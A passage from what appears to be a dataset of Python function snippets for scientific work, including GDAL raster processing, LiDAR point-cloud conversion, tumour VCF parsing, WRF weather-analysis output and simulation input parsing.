farm_pollinator_abundance_defn.SetPrecision(11)\n target_layer.CreateField(farm_pollinator_abundance_defn)\n\n total_farm_yield_field_defn = ogr.FieldDefn(\n _TOTAL_FARM_YIELD_FIELD_ID, ogr.OFTReal)\n total_farm_yield_field_defn.SetWidth(25)\n total_farm_yield_field_defn.SetPrecision(11)\n target_layer.CreateField(total_farm_yield_field_defn)\n\n pol_proportion_farm_yield_field_defn = ogr.FieldDefn(\n _POLLINATOR_PROPORTION_FARM_YIELD_FIELD_ID, ogr.OFTReal)\n pol_proportion_farm_yield_field_defn.SetWidth(25)\n pol_proportion_farm_yield_field_defn.SetPrecision(11)\n target_layer.CreateField(pol_proportion_farm_yield_field_defn)\n\n wild_pol_farm_yield_field_defn = ogr.FieldDefn(\n _WILD_POLLINATOR_FARM_YIELD_FIELD_ID, ogr.OFTReal)\n wild_pol_farm_yield_field_defn.SetWidth(25)\n wild_pol_farm_yield_field_defn.SetPrecision(11)\n target_layer.CreateField(wild_pol_farm_yield_field_defn)\n\n target_layer = None\n target_vector.FlushCache()\n target_vector = None", "def read_vector_file(fname):\n return np.genfromtxt(fname)", "def convert(threshold, infile, tmpfile_1, tmpfile_2, outfile):\n args = [\n \"gdal_calc.py\",\n '-A', infile,\n '--outfile={}'.format(tmpfile_1),\n '--calc=logical_and(A>={}, A<999)'.format(threshold),\n '--type=Byte', '--NoDataValue=0',\n '--co=SPARSE_OK=YES',\n '--co=NBITS=1',\n '--quiet'\n # Could enable compression\n # --co=\"COMPRESS=LZW\"\n ]\n subprocess.run(args)\n\n subprocess.run([\n \"gdal_polygonize.py\",\n tmpfile_1,\n '-q',\n '-f', 'ESRI Shapefile',\n tmpfile_2\n ])\n\n 
subprocess.run([\n \"ogr2ogr\",\n '-a_srs', 'EPSG:4326',\n outfile,\n tmpfile_2\n ])\n\n subprocess.run([\"rm\", tmpfile_1])\n subprocess.run([\"rm\", tmpfile_2])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'shx')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'dbf')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'prj')])", "def generate_ROI_file(FreeSurfer_ROI_file):\n\tfrom nipype.interfaces.freesurfer import MRIConvert\n\tmc = MRIConvert()\n\tmc.inputs.in_file = FreeSurfer_ROI_file\n\tmc.inputs.out_type = 'niigz'\n\tmc.run()\n\n\timport nipype.interfaces.cmtk as cmtk\n\trg = cmtk.ROIGen()\n\trg.inputs.aparc_aseg_file = FreeSurfer_ROI_file.split('.')[0] + '_out.nii.gz'\n\trg.inputs.use_freesurfer_LUT = True\n\tout_file = rg.run()\n\n\treturn out_file", "def read_DEM(fn=None, fjord=None):\n # intake.open_rasterio accepts a list of input files and may effectively do what this function does!\n # try using cropped versions of the input files. Doesn't seem to make a difference r.e. crashing\n '''\n cropped_fn = fn.rpartition(\".tif\")[0] + \"_cropped.tif\"\n print(cropped_fn)\n if os._exists(cropped_fn):\n fn = cropped_fn\n elif fjord != None:\n bbox = fjord_props.get_fjord_bounds(fjord)\n ds = rioxarray.open_rasterio(fn)\n trimmed_ds = ds.rio.slice_xy(*bbox)\n trimmed_ds.rio.to_raster(fn.rpartition(\".tif\")[0] + \"_cropped.tif\")\n del ds\n del trimmed_ds\n fn = cropped_fn \n '''\n\n # try bringing in the rasters as virtual rasters (i.e. lazily loading)\n with rasterio.open(fn) as src:\n # print('Source CRS:' +str(src.crs))\n # print(src.is_tiled)\n # print(src.block_shapes)\n with WarpedVRT(src,src_crs=src.crs,crs=src.crs) as vrt:\n # warp_mem_limit=12000,warp_extras={'NUM_THREADS':2}) as vrt:\n # print('Destination CRS:' +str(vrt.crs))\n darr = xr.open_rasterio(vrt)\n # ds = rioxarray.open_rasterio(vrt).chunk({'x':1500,'y':1500,'band':1}).to_dataset(name='HLS_Red')\n\n\n # Rasterio automatically checks that the file exists\n # ultimately switch to using rioxarray, but it causes issues down the pipeline so it will need to be debugged through\n # with rioxarray.open_rasterio(fn) as src:\n # with xr.open_rasterio(fn) as darr:\n # darr = src\n\n # open_rasterio automatically brings the geotiff in as a DataArray with 'band' as a dimensional coordinate\n # we rename it and remove the band as a coordinate, since our DEM only has one dimension\n # squeeze removes dimensions of length 0 or 1, in this case our 'band'\n # Then, drop('band') actually removes the 'band' dimension from the Dataset\n darr = darr.rename('elevation').squeeze().drop_vars('band')\n # darr = darr.rename({'band':'dtime'})\n \n # if we wanted to instead convert it to a dataset\n # attr = darr.attrs\n # darr = darr.to_dataset(name='elevation').squeeze().drop('band')\n # darr.attrs = attr\n # attr=None\n # newest version of xarray (0.16) has promote_attrs=True kwarg. 
Earlier versions don't...\n # darr = darr.to_dataset(name='elevation', promote_attrs=True).squeeze().drop('band')\n\n # mask out the nodata values, since the nodatavals attribute is wrong\n darr = darr.where(darr != -9999.)\n\n # the gdalwarp geoid files have this extra attribute in the geoTiff, which when brought in\n # ultimately causes a \"__module__\" related error when trying to plot with hvplot\n try:\n del darr.attrs[\"units\"] \n except KeyError:\n pass\n\n if fjord != None:\n # USE RIOXARRAY - specifically, slicexy() which can be fed the bounding box\n # darr = darr.rio.slice_xy(fjord_props.get_fjord_bounds(fjord))\n bbox = fjord_props.get_fjord_bounds(fjord)\n if pd.Series(darr.y).is_monotonic_increasing:\n darr = darr.sel(x=slice(bbox[0], bbox[2]), y=slice(bbox[1], bbox[3]))\n else:\n darr = darr.sel(x=slice(bbox[0], bbox[2]), y=slice(bbox[3], bbox[1]))\n \n return darr", "def write_input(self):\n # load template, substitute parameters and write input file\n self.homog_core()\n self.write_mat_string()\n input_tmpl = open('base_input.txt')\n templ = Template(input_tmpl.read())\n file_string = templ.substitute(cool_frac = self.vfrac_cermet,\n r_core = self.r,\n core_z = self.z,\n r_refl = self.r + self.refl_t,\n refl_min = -self.refl_t,\n refl_max = self.z + self.refl_t,\n fuel_string = self.fuel_string,\n fuel_rho = self.rho,\n fuel_vol = self.core_vol,\n refl_vol = self.core_vol,\n thermal_power = self.Q_therm)\n # write the file\n filename = 'r_{0}_{1}.i'.format(round(self.vfrac_cermet, 3), \n round(self.r, 3))\n ifile = open(filename, 'w')\n ifile.write(file_string)\n ifile.close()\n\n return filename", "def align_rasters(ref_raster, tar_raster, output_suffix):\n command = [\"gdalbuildvrt\", \"-te\"]\n hDataset = gdal.Open(ref_raster, gdal.GA_ReadOnly)\n if hDataset is None:\n return False\n adfGeoTransform = hDataset.GetGeoTransform(can_return_null=True)\n\n tif_file=tar_raster\n vrt_file = tif_file.replace('.tif', '.vrt')\n\n if adfGeoTransform is not None:\n dfGeoXUL = adfGeoTransform[0]\n dfGeoYUL = adfGeoTransform[3]\n dfGeoXLR = adfGeoTransform[0] + adfGeoTransform[1] * hDataset.RasterXSize + \\\n adfGeoTransform[2] * hDataset.RasterYSize\n dfGeoYLR = adfGeoTransform[3] + adfGeoTransform[4] * hDataset.RasterXSize + \\\n adfGeoTransform[5] * hDataset.RasterYSize\n xres = str(abs(adfGeoTransform[1]))\n yres = str(abs(adfGeoTransform[5]))\n\n subprocess.call(command + [str(dfGeoXUL), str(dfGeoYLR), str(dfGeoXLR),\n str(dfGeoYUL), \"-q\", \"-tr\", xres, yres,\n vrt_file, tif_file])\n\n output_file = tif_file.replace('.tif', output_suffix)\n\n print('gdal_translate -q {} {}'.format(vrt_file, output_file))\n\n cmd = 'gdal_translate -q {} {}'.format(vrt_file, output_file)\n\n #print(dfGeoXUL, dfGeoYLR, dfGeoXLR, dfGeoYUL, xres, yres)\n\n subprocess.call(cmd, shell=True)\n os.remove(vrt_file)\n\n return True\n\n else:\n\n return False", "def exec_ripser(data_path,output_path,max_dim,input_file='input.txt',format_file = 'lower-distance',threshold=None):\n ############# RIPSER ####################\n # high dimension\n ## execfile ripser (OUTPUT from ripser)\n start = timeit.default_timer() \n print 'input_file ',input_file\n input_file_full = os.path.join(data_path,input_file)\n output_file_full = os.path.join(output_path,'output_ripser.txt')\n\n if threshold is None:\n ripser_arguments = 'ripser --format %s --dim %i %s'%(format_file,max_dim,input_file_full)\n else:\n ripser_arguments = 'ripser --format %s --dim %i --threshold %f 
%s'%(format_file,max_dim,threshold,input_file_full)\n \n ripser_call(ripser_arguments.split(' '),output_file_full)\n #os.system(ripser_call) # OLD CALL BASED ON executable\n\n stop = timeit.default_timer()\n print 'Ripser execution time '\n print stop - start \n input_file_path = os.path.join(data_path,'input.txt')\n if(os.path.isfile(input_file_path)):\n os.remove(input_file_path) ## remove auxiliar file with lower matrix used as input for Ripser\n return()", "def process_input_file(filename):\n f = open(filename, 'r')\n\n rows = []\n i = 0\n for line in f:\n # skip optimal steps and time limit\n if i > 1 and len(line.strip()) > 0:\n rows.append(list(line.strip()))\n i += 1\n\n f.close()\n\n row_len = len(rows[0])\n num_rows = len(rows)\n\n return LaserTankMap(row_len, num_rows, rows)", "def main(fn_input, fn_output):\n # read file\n inter = Interpolator()\n inter.read_file(fn_input)\n inter.write_interpolated(fn_output)", "def convert(input, output, point_format_id, file_version, force):\n if (\n point_format_id is not None\n and point_format_id not in pylas.supported_point_formats()\n ):\n click.echo(\n click.style(\n \"Point format {} is not supported\".format(point_format_id), fg=\"red\"\n )\n )\n raise click.Abort()\n\n if file_version is not None and file_version not in pylas.supported_versions():\n click.echo(\n click.style(\n \"LAS version {} is not supported\".format(file_version), fg=\"red\"\n )\n )\n raise click.Abort()\n\n las = pylas.read(openbin_file(input))\n if point_format_id is not None and not force:\n lost_dimensions = pylas.lost_dimensions(\n las.points_data.point_format.id, point_format_id\n )\n if lost_dimensions:\n click.echo(\"Converting will lose: {}\".format(lost_dimensions))\n click.confirm(\"Continue ?\", abort=True)\n\n try:\n las = pylas.convert(\n las, point_format_id=point_format_id, file_version=file_version\n )\n except pylas.errors.PylasError as e:\n click.echo(click.style(\"{}: {}\".format(e.__class__.__name__, e), fg=\"red\"))\n raise click.Abort()\n except Exception as e:\n click.echo(click.style(str(e), fg=\"red\"))\n raise click.Abort()\n else:\n las.write(openbin_file(output, mode='w'), do_compress=output.endswith('.laz'))", "def build_r_map(input_file: str, output_file: str, threshold: float):\n\n DataSiPM = db.DataSiPMsim_only('petalo', 0) # full body PET\n DataSiPM_idx = DataSiPM.set_index('SensorID')\n\n try:\n sns_response = pd.read_hdf(input_file, 'MC/sns_response')\n except ValueError:\n print(f'File {input_file} not found')\n exit()\n except OSError:\n print(f'File {input_file} not found')\n exit()\n except KeyError:\n print(f'No object named MC/sns_response in file {input_file}')\n exit()\n print(f'Analyzing file {input_file}')\n\n sel_df = rf.find_SiPMs_over_threshold(sns_response, threshold)\n\n particles = pd.read_hdf(input_file, 'MC/particles')\n hits = pd.read_hdf(input_file, 'MC/hits')\n events = particles.event_id.unique()\n\n true_r1, true_r2 = [], []\n var_phi1, var_phi2 = [], []\n var_z1, var_z2 = [], []\n\n touched_sipms1, touched_sipms2 = [], []\n\n for evt in events:\n\n ### Select photoelectric events only\n evt_parts = particles[particles.event_id == evt]\n evt_hits = hits [hits .event_id == evt]\n select, true_pos = mcf.select_photoelectric(evt_parts, evt_hits)\n if not select: continue\n\n sns_resp = sel_df[sel_df.event_id == evt]\n if len(sns_resp) == 0: continue\n\n _, _, pos1, pos2, q1, q2 = rf.assign_sipms_to_gammas(sns_resp, true_pos, DataSiPM_idx)\n\n if len(pos1) > 0:\n pos_phi = 
rf.from_cartesian_to_cyl(np.array(pos1))[:,1]\n _, var_phi = rf.phi_mean_var(pos_phi, q1)\n\n pos_z = np.array(pos1)[:,2]\n mean_z = np.average(pos_z, weights=q1)\n var_z = np.average((pos_z-mean_z)**2, weights=q1)\n r = np.sqrt(true_pos[0][0]**2 + true_pos[0][1]**2)\n\n var_phi1 .append(var_phi)\n var_z1 .append(var_z)\n touched_sipms1.append(len(pos1))\n true_r1 .append(r)\n\n else:\n var_phi1 .append(1.e9)\n var_z1 .append(1.e9)\n touched_sipms1.append(1.e9)\n true_r1 .append(1.e9)\n\n if len(pos2) > 0:\n pos_phi = rf.from_cartesian_to_cyl(np.array(pos2))[:,1]\n _, var_phi = rf.phi_mean_var(pos_phi, q2)\n\n pos_z = np.array(pos2)[:,2]\n mean_z = np.average(pos_z, weights=q2)\n var_z = np.average((pos_z-mean_z)**2, weights=q2)\n r = np.sqrt(true_pos[1][0]**2 + true_pos[1][1]**2)\n\n var_phi2 .append(var_phi)\n var_z2 .append(var_z)\n touched_sipms2.append(len(pos2))\n true_r2 .append(r)\n\n else:\n var_phi2 .append(1.e9)\n var_z2 .append(1.e9)\n touched_sipms2.append(1.e9)\n true_r2 .append(1.e9)\n\n a_true_r1 = np.array(true_r1)\n a_true_r2 = np.array(true_r2)\n a_var_phi1 = np.array(var_phi1)\n a_var_phi2 = np.array(var_phi2)\n a_var_z1 = np.array(var_z1)\n a_var_z2 = np.array(var_z2)\n\n a_touched_sipms1 = np.array(touched_sipms1)\n a_touched_sipms2 = np.array(touched_sipms2)\n\n\n np.savez(output_file, a_true_r1=a_true_r1, a_true_r2=a_true_r2, a_var_phi1=a_var_phi1, a_var_phi2=a_var_phi2, a_var_z1=a_var_z1, a_var_z2=a_var_z2, a_touched_sipms1=a_touched_sipms1, a_touched_sipms2=a_touched_sipms2)", "def make_big_vdwradii( targetpath ):\n\n file = open( os.path.join( targetpath, 'vdwradii.dat'), 'w')\n text=\"\"\"; Very approximate VanderWaals radii\n; only used for drawing atoms as balls or for calculating atomic overlap.\n; longest matches are used\n; '???' or '*' matches any residue name\n; 'AAA' matches any protein residue name\n; MODIFIED TO USE BIG VDW RADII TO PREVENT WATERS BEING PUT IN THE PROTEIN WHERE WE DON'T WANT THEM. DLM\n??? C 0.3\n??? F 0.3\n??? H 0.3\n??? N 0.3\n??? O 0.3\n??? P 0.3\n??? S 0.3\n??? LP1 0\n??? 
LP2 0\nSOL H 0.04\nSOL O 0.105\nWAT H 0.04\nWAT O 0.105\nGLY MN1 0\nGLY MN2 0\nALA MCB1 0\nALA MCB2 0 \nVAL MCG1 0 \nVAL MCG2 0 \nILE MCG1 0 \nILE MCG2 0 \nILE MCD1 0 \nILE MCD2 0 \nLEU MCD1 0 \nLEU MCD2 0 \nMET MCE1 0 \nMET MCE2 0 \nTRP MTRP1 0 \nTRP MTRP2 0\nTHR MCG1 0\nTHR MCG2 0\nLYSH MNZ1 0 \nLYSH MNZ2 0 \n\"\"\" \n file.writelines(text)\n file.close()", "def filter_ground(jparams):\n\n # load las file and relevant parameters\n point_cloud = File(jparams['input-las'], mode='r')\n scale = point_cloud.header.scale[0]\n print(point_cloud.header.min)\n print('- Flattening point cloud')\n gridded_pc = point_cloud_to_grid(point_cloud=point_cloud, tf=jparams['thinning-factor'],\n cell_size=int(jparams['gf-cellsize'] / scale))\n\n ground_points, unprocessed_points, ll_origin = gridded_pc[0], gridded_pc[1], gridded_pc[2]\n\n print('- Growing terrain')\n dt = startin.DT()\n dt.insert(list(ground_points))\n dt = grow_terrain(tin=dt, p=unprocessed_points, gp=ground_points,\n max_distance=int(jparams['gf-distance'] / scale),\n max_angle=jparams['gf-angle'])\n\n print('- Writing point cloud')\n with File(jparams['output-las'], mode='w', header=point_cloud.header) as out_file:\n gp = dt.all_vertices()[1:]\n out_file.X = [p[0] for p in gp]\n out_file.Y = [p[1] for p in gp]\n out_file.Z = [p[2] for p in gp]\n\n print('- Creating raster (TIN)\\n\\t- Interpolating (TIN)')\n dg = tin_interp(tin=dt, cell_size=int(jparams['grid-cellsize'] / scale))\n\n print('\\t- Writing Esri Ascii (TIN)')\n write_asc(grid=np.rot90(dg[0]) * scale + point_cloud.header.min[2],\n cell_size=jparams['grid-cellsize'],\n fn=jparams['output-grid-tin'],\n origin=(point_cloud.header.min[0]+dg[1][0]*scale, point_cloud.header.min[1] + dg[1][1]*scale),\n depth=2)\n\n print('- Creating raster (IDW)\\n\\t- Interpolating (IDW)')\n ig = idw_interp(tin=dt, cell_size=int(jparams['grid-cellsize'] / scale),\n radius=jparams['idw-radius'] / scale, \n power=jparams['idw-power'])\n\n print('\\t- Writing Esri Ascii (IDW)')\n write_asc(grid=np.rot90(ig[0]) * scale + point_cloud.header.min[2],\n cell_size=jparams['grid-cellsize'],\n fn=jparams['output-grid-idw'],\n origin=(point_cloud.header.min[0]+ig[1][0]*scale, point_cloud.header.min[1]+ig[1][1]*scale),\n depth=2)\n\n return", "def process_radia_vcf(job, radia_vcf, work_dir, univ_options):\n radia_vcf = job.fileStore.readGlobalFile(radia_vcf)\n with open(radia_vcf, 'r') as infile, open(radia_vcf + 'radia_parsed.tmp', 'w') as outfile:\n # The columns in INFILE are\n # [0] CHROM\n # [1] POS\n # [2] ID\n # [3] REF\n # [4] ALT\n # [5] QUAL\n # [6] FILTER\n # [7] INFO\n # [8] FORMAT\n # [9] DNA_NORMAL\n # [10] DNA_TUMOR\n # [11] RNA_TUMOR - Not always present\n for line in infile:\n # Print header to outfile\n if line.startswith('#'):\n print(line.strip(), file=outfile)\n continue\n line = line.strip().split('\\t')\n # If the call was not PASSing, or if the call was germline: skip\n if line[6] != 'PASS' or 'MT=GERM' in line[7]:\n continue\n # If there is just 1 ALT allele, print and continue\n if len(line[4]) == 1:\n print('\\t'.join(line), file=outfile)\n # If not, process\n else:\n seq_field_indeces = [9, 10]\n alleles = [line[3]] + line[4].split(',') # all alleles, incl. 
REF\n # collect tumor, normal and (if present) rna AD and AFs\n # AD = Depth of reads supporting each allele\n # AF = Fraction of reads supporting each allele\n # normal_ad = line[9].split(':')[5].split(',')\n normal_af = line[9].split(':')[6].split(',')\n tumor_ad = line[10].split(':')[5].split(',')\n tumor_af = line[10].split(':')[6].split(',')\n if len(line[11]) > 1:\n rna_ad = line[11].split(':')[5].split(',')\n rna_af = line[11].split(':')[6].split(',')\n seq_field_indeces += [11] # append rna since it is present\n else:\n # If rna is missing, set RNA_AD and RNA_AF to null sets for easily\n # integrating into the logic in the following code\n rna_ad = rna_af = [0, 0, 0, 0]\n # Initialise variables to store the probable ALT alleles and the index values of\n # the same wrt AD and AF\n out_alleles = set([])\n out_af_ad_index = {0}\n # parse AD and AF to get most probable ALT alleles\n for i in range(1, len(normal_af)):\n # Criteria for selection = AD > 4 and AF >0.1 in either tumor or RNA, given\n # normal AF < 0.1\n if ((float(tumor_af[i]) >= 0.1 and int(tumor_ad[i]) >= 4) or\n (float(rna_af[i]) >= 0.1 and int(rna_ad[i]) >= 4)) and \\\n (float(normal_af[i]) < 0.1):\n out_alleles.add(alleles[i])\n out_af_ad_index.add(i)\n # If the number of probable alleles is greater than 0 the print to outfile with\n # the modified allele fraction representing reads corrresponding to all alleles\n if len(out_alleles) > 0:\n line[4] = ','.join(out_alleles) # set alt alleles\n # Modify the AD and AF values in the TUMOR/NORMAL/RNA fields\n # one at a time. Seq fields contain\n # [0] GT* - Genotype\n # [1] DP - Read depth at this position in the sample\n # [2] INDEL - Number of indels\n # [3] START - Number of reads starting at this position\n # [4] STOP - Number of reads stopping at this position\n # [5] AD* - Depth of reads supporting alleles\n # [6] AF* - Fraction of reads supporting alleles\n # [7] BQ* - Avg base quality for reads supporting alleles\n # [8] SB* - Strand Bias for reads supporting alleles\n # Fields marked with *s are teh ones that contain info for each seq field\n # and need to be modified\n for seq_field_index in seq_field_indeces:\n # Get the details for seq_field\n deets = line[seq_field_index].split(':')\n # modify fields 5 thu 8 to hold only info for the probable\n # alleles\n for field_index in range(5, 9):\n field = deets[field_index].split(\",\")\n deets[field_index] = \",\".join([x for i, x in enumerate(field)\n if i in out_af_ad_index])\n # Modify DP to hold the new total of reads\n deets[1] = str(sum([int(x) for x in deets[5].split(\",\")]))\n # get the most likely genotypes based on AD and AF\n gt_by_ad = set([i for i, x in enumerate(deets[5].split(\",\"))\n if int(x) >= 4])\n gt_by_af = set([i for i, x in enumerate(deets[6].split(\",\"))\n if float(x) >= 0.1])\n # Get the consensus genotype\n genotype = gt_by_ad.intersection(gt_by_af)\n if len(genotype) == 0:\n deets[0] = \"0/0\"\n elif len(genotype) == 1:\n deets[0] = \"/\".join([str(x) for x in genotype] +\n [str(x) for x in genotype])\n elif len(genotype) == 2:\n deets[0] = \"/\".join([str(x) for x in genotype])\n else:\n print(\"ERROR : triple genotype detected\", file=sys.stderr)\n print(line, file=sys.stdout)\n # Rejoin the details line\n line[seq_field_index] = \":\".join(deets)\n # Print the modified line to output\n print(\"\\t\".join(line), file=outfile)\n # Else do nothing\n else:\n pass\n return outfile.name", "def loadGeoTransform(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n 
return ds.GetGeoTransform()", "def generate_resfile_from_pdb(pdbfilename, resfilename, input_sc = True ):\n\tp = rosetta.core.import_pose.pose_from_file(pdbfilename)\n\tgenerate_resfile_from_pose(p, resfilename, input_sc)", "def postTTUWRFanalysis(inpath, outpath,\n refpath='/lustre/research/bancell/aucolema/HWT2016runs/2016050800/wrfoutREF'):\n # Pull analysis variables\n og_analysis = Dataset(inpath)\n anlvars = og_analysis.variables['T'][0]\n gph300 = anlvars[0,:,:]\n gph500 = anlvars[1,:,:]\n gph700 = anlvars[2,:,:]\n gph850 = anlvars[3,:,:]\n gph925 = anlvars[4,:,:]\n temp300 = anlvars[5,:,:]\n temp500 = anlvars[6,:,:]\n temp700 = anlvars[7,:,:]\n temp850 = anlvars[8,:,:]\n temp925 = anlvars[9,:,:]\n u300 = anlvars[10,:,:]\n u500 = anlvars[11,:,:]\n u700 = anlvars[12,:,:]\n u850 = anlvars[13,:,:]\n u925 = anlvars[14,:,:]\n v300 = anlvars[15,:,:]\n v500 = anlvars[16,:,:]\n v700 = anlvars[17,:,:]\n v850 = anlvars[18,:,:]\n v925 = anlvars[19,:,:]\n td300 = anlvars[20,:,:]\n td500 = anlvars[21,:,:]\n td700 = anlvars[22,:,:]\n td850 = anlvars[23,:,:]\n td925 = anlvars[24,:,:]\n q300 = anlvars[25,:,:]\n q500 = anlvars[26,:,:]\n q700 = anlvars[27,:,:]\n q850 = anlvars[28,:,:]\n q925 = anlvars[29,:,:]\n slp = anlvars[30,:,:]\n t2 = anlvars[31,:,:]\n td2 = anlvars[32,:,:]\n u10 = anlvars[33,:,:]\n v10 = anlvars[34,:,:]\n\n wrf_d1 = Dataset(refpath)\n lons, lats = wrf_d1.variables['XLONG'][0], wrf_d1.variables['XLAT'][0]\n wrf_idim = len(lons[0,:])\n wrf_jdim = len(lats[:,0])\n\n sensvarlist = [gph300,gph500,gph700,gph850,gph925,temp300,temp500,temp700,\n temp850,temp925,u300,u500,u700,u850,u925,v300,\n v500,v700,v850,v925,td300,td500,td700,td850,\n td925,q300,q500,q700,q850,q925,slp,t2,td2,u10,v10]\n sensstringslist = [\"300 hPa GPH\",\"500 hPa GPH\",\"700 hPa GPH\",\n \"850 hPa GPH\",\"925 hPa GPH\",\"300 hPa T\",\"500 hPa T\",\n \"700 hPa T\",\"850 hPa T\",\"925 hPa T\",\"300 hPa U-Wind\",\n \"500 hPa U-Wind\",\"700 hPa U-Wind\",\"850 hPa U-Wind\",\n \"925 hPa U-Wind\",\"300 hPa V-Wind\",\"500 hPa V-Wind\",\n \"700 hPa V-Wind\",\"850 hPa V-Wind\",\"925 hPa V-Wind\",\n \"300 hPa Dewpt\", \"500 hPa Dewpt\", \"700 hPa Dewpt\",\n \"850 hPa Dewpt\", \"925 hPa Dewpt\", \"300 hPa Q\",\n \"500 hPa Q\", \"700 hPa Q\", \"850 hPa Q\", \"925 hPa Q\",\n \"SLP\",\"2m Temp\",\"2m Dewpt\",\n \"10m U-Wind\",\"10m V-Wind\"]\n\n\n # Write interpolated variables to netCDF\n new_analysis = Dataset(outpath, \"w\", format=\"NETCDF4\")\n new_analysis.createDimension('lat', wrf_jdim)\n new_analysis.createDimension('lon', wrf_idim)\n new_analysis.createDimension('time', None)\n xlat = new_analysis.createVariable(\"XLAT\", float, dimensions=('lat','lon'))\n xlat[:,:] = lats\n xlon = new_analysis.createVariable(\"XLONG\", float, dimensions=('lat','lon'))\n xlon[:,:] = lons\n\n # Interpolate and save!!\n for i in range(len(sensvarlist)):\n var = new_analysis.createVariable(sensstringslist[i].replace(\" \",\"_\"),\n sensvarlist[i].dtype,\n dimensions=('lat','lon'))\n var[:,:] = sensvarlist[i]\n new_analysis.close()\n return", "def postTTUWRFanalysis(inpath, outpath,\n refpath='/lustre/research/bancell/aucolema/HWT2016runs/2016050800/wrfoutREF'):\n # Pull analysis variables\n og_analysis = Dataset(inpath)\n anlvars = og_analysis.variables['T'][0]\n gph300 = anlvars[0,:,:]\n gph500 = anlvars[1,:,:]\n gph700 = anlvars[2,:,:]\n gph850 = anlvars[3,:,:]\n gph925 = anlvars[4,:,:]\n temp300 = anlvars[5,:,:]\n temp500 = anlvars[6,:,:]\n temp700 = anlvars[7,:,:]\n temp850 = anlvars[8,:,:]\n temp925 = anlvars[9,:,:]\n u300 = 
anlvars[10,:,:]\n u500 = anlvars[11,:,:]\n u700 = anlvars[12,:,:]\n u850 = anlvars[13,:,:]\n u925 = anlvars[14,:,:]\n v300 = anlvars[15,:,:]\n v500 = anlvars[16,:,:]\n v700 = anlvars[17,:,:]\n v850 = anlvars[18,:,:]\n v925 = anlvars[19,:,:]\n td300 = anlvars[20,:,:]\n td500 = anlvars[21,:,:]\n td700 = anlvars[22,:,:]\n td850 = anlvars[23,:,:]\n td925 = anlvars[24,:,:]\n q300 = anlvars[25,:,:]\n q500 = anlvars[26,:,:]\n q700 = anlvars[27,:,:]\n q850 = anlvars[28,:,:]\n q925 = anlvars[29,:,:]\n slp = anlvars[30,:,:]\n t2 = anlvars[31,:,:]\n td2 = anlvars[32,:,:]\n u10 = anlvars[33,:,:]\n v10 = anlvars[34,:,:]\n\n wrf_d1 = Dataset(refpath)\n lons, lats = wrf_d1.variables['XLONG'][0], wrf_d1.variables['XLAT'][0]\n wrf_idim = len(lons[0,:])\n wrf_jdim = len(lats[:,0])\n\n sensvarlist = [gph300,gph500,gph700,gph850,gph925,temp300,temp500,temp700,\n temp850,temp925,u300,u500,u700,u850,u925,v300,\n v500,v700,v850,v925,td300,td500,td700,td850,\n td925,q300,q500,q700,q850,q925,slp,t2,td2,u10,v10]\n sensstringslist = [\"300 hPa GPH\",\"500 hPa GPH\",\"700 hPa GPH\",\n \"850 hPa GPH\",\"925 hPa GPH\",\"300 hPa T\",\"500 hPa T\",\n \"700 hPa T\",\"850 hPa T\",\"925 hPa T\",\"300 hPa U-Wind\",\n \"500 hPa U-Wind\",\"700 hPa U-Wind\",\"850 hPa U-Wind\",\n \"925 hPa U-Wind\",\"300 hPa V-Wind\",\"500 hPa V-Wind\",\n \"700 hPa V-Wind\",\"850 hPa V-Wind\",\"925 hPa V-Wind\",\n \"300 hPa Dewpt\", \"500 hPa Dewpt\", \"700 hPa Dewpt\",\n \"850 hPa Dewpt\", \"925 hPa Dewpt\", \"300 hPa Q\",\n \"500 hPa Q\", \"700 hPa Q\", \"850 hPa Q\", \"925 hPa Q\",\n \"SLP\",\"2m Temp\",\"2m Dewpt\",\n \"10m U-Wind\",\"10m V-Wind\"]\n\n\n # Write interpolated variables to netCDF\n new_analysis = Dataset(outpath, \"w\", format=\"NETCDF4\")\n new_analysis.createDimension('lat', wrf_jdim)\n new_analysis.createDimension('lon', wrf_idim)\n new_analysis.createDimension('time', None)\n xlat = new_analysis.createVariable(\"XLAT\", float, dimensions=('lat','lon'))\n xlat[:,:] = lats\n xlon = new_analysis.createVariable(\"XLONG\", float, dimensions=('lat','lon'))\n xlon[:,:] = lons\n\n # Interpolate and save!!\n for i in range(len(sensvarlist)):\n var = new_analysis.createVariable(sensstringslist[i].replace(\" \",\"_\"),\n sensvarlist[i].dtype,\n dimensions=('lat','lon'))\n var[:,:] = sensvarlist[i]\n new_analysis.close()\n return", "def inputfile(filename):\n infile = open(filename, 'r')\n lines = infile.readlines()\n\n # --------------------------------------------------------------------------\n # Domain specifications\n\n Nx = eval(lines[15][lines[15].find('=')+1:].strip())\n ax = eval(lines[16][lines[16].find('=')+1:].strip())\n bx = eval(lines[17][lines[17].find('=')+1:].strip())\n\n Ny = eval(lines[19][lines[19].find('=')+1:].strip())\n ay = eval(lines[20][lines[20].find('=')+1:].strip())\n by = eval(lines[21][lines[21].find('=')+1:].strip())\n\n Nz = eval(lines[23][lines[23].find('=')+1:].strip())\n az = eval(lines[24][lines[24].find('=')+1:].strip())\n bz = eval(lines[25][lines[25].find('=')+1:].strip())\n\n Nvx = eval(lines[27][lines[27].find('=')+1:].strip())\n avx = eval(lines[28][lines[28].find('=')+1:].strip())\n bvx = eval(lines[29][lines[29].find('=')+1:].strip())\n\n Nvy = eval(lines[31][lines[31].find('=')+1:].strip())\n avy = eval(lines[32][lines[32].find('=')+1:].strip())\n bvy = eval(lines[33][lines[33].find('=')+1:].strip())\n\n Nvz = eval(lines[35][lines[35].find('=')+1:].strip())\n avz = eval(lines[36][lines[36].find('=')+1:].strip())\n bvz = eval(lines[37][lines[37].find('=')+1:].strip())\n\n Nt = 
eval(lines[39][lines[39].find('=')+1:].strip())\n T = eval(lines[40][lines[40].find('=')+1:].strip())\n\n N = eval(lines[46][lines[46].find('=')+1:].strip())\n\n # --------------------------------------------------------------------------\n # list of phase space variables used, in etc/params.dat must set unused\n # vars to have Nz as None, z = x, vx, y, ...\n # e.g. in 1D1V, phasespace_vars = ['x', 'vx']\n phasespace_vars = []\n if Nx is not None:\n phasespace_vars.append('x')\n if Ny is not None:\n phasespace_vars.append('y')\n if Nz is not None:\n phasespace_vars.append('z')\n if Nvx is not None:\n phasespace_vars.append('vx')\n if Nvy is not None:\n phasespace_vars.append('vy')\n if Nvz is not None:\n phasespace_vars.append('vz')\n\n # ==========================================================================\n # Boundary conditions dictionary -- contains dist. function BCs as well as phi\n\n BC = {}\n 